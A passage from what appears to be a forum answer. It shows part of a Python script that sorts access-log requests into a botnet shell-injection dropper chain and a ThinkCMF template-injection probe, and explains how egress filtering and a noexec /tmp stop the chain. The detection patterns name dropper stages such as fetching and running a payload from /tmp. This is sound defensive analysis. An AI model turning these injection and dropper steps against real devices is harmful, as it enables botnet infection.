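    the 'execute what we just dropped' step."""
    labelled = []
    for cmd in commands:
        verb = cmd.split()[0]
        if verb in STAGE_LABELS:
            labelled.append((cmd, STAGE_LABELS[verb]))
        elif verb.startswith(("/tmp/", "./")):
            labelled.append((cmd, "execute the dropped payload"))
        else:
            labelled.append((cmd, "unrecognised"))
    return labelled


def classify(request_line):
    """Classify one 'METHOD target [protocol]' request line from an access log.
    'expected_target' is the software the probe is written for."""
    _method, target = request_line.split()[:2]
    decoded = decode_target(target)
    parts = urlsplit(decoded)
    if parts.path == "/shell" and ";" in parts.query:
        return {
            "kind": "shell command injection (botnet dropper chain)",
            "expected_target": "embedded devices whose web interface runs shell "
                               "commands, not a patched Apache host",
            "stages": label_chain(shell_chain(decoded)),
        }
    if "{php}" in decoded and "{/php}" in decoded:
        return {
            "kind": "template injection probe (ThinkCMF fetch/content pattern)",
            "expected_target": "ThinkCMF (a PHP CMS); the payload names it, so this "
                               "is not a WordPress exploit",
            "stages": [],
        }
    return {"kind": "no known probe signature", "expected_target": None, "stages": []}


if __name__ == "__main__":
    for line in (MOZI_PROBE, THINKCMF_PROBE, "GET /index.html HTTP/1.1"):
        print(classify(line))
```

The cut-off points fall out of the stages: a host that cannot reach the payload URL (egress filtering) stops the chain at the fetch step, and a noexec /tmp stops it at the execute step, regardless of whether the injection itself ever worked.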

  • A. Buford
  • Aug 10th, 2021